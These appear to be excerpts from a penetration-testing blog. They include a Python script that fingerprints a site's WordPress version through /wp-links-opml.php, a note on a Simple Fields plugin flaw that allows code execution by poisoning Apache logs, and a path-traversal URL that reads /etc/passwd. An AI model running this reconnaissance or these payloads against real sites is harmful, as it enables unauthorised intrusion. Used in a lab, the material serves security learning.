Python Script: Retrieve WordPress Version

by Vince

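#!/usr/bin/env python3
# Ported to Python 3 (urllib2 -> urllib.request) with indentation restored.
# Fetches /wp-links-opml.php and prints the line carrying the 'generator'
# tag, which discloses the WordPress version.
import urllib.request

print("[*] Target URL format = http://www.mydomain.com")
host = input("[*] Enter target URL: ")
path = '/wp-links-opml.php'
combined = host + path
url = urllib.request.urlopen(combined)
print()
print("fetching... " + combined)
# The response body is bytes in Python 3; decode it before the substring test.
html = url.read().decode('utf-8', errors='replace').splitlines()
for line in html:
    if 'generator' in line:
        print()
        print(line)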

The Reality of Log Contamination

by Vince

I came across a web site running a current version of WordPress with the Simple Fields plugin installed.  Searching Exploit-DB, I found:

WordPress Plugin Simple Fields 0.2 - 0.3.5 - Local/Remote File Inclusion / Remote Code Execution

“This can even lead to remote code execution, for example by injecting php code into the apache logs or if allow_url_include is turned on in php.ini.”


Python: Automating Local File Inclusion (LFI)

by Vince

The first time you find a page with a Local File Inclusion (LFI) vulnerability, it's like magic.  You feed your string in the browser:

http://192.168.150.150/vulnerable.php?page=../../../../../../../../etc/passwd%00

... it spits back the contents of /etc/passwd, you're excited, and you continue enumerating the system. 
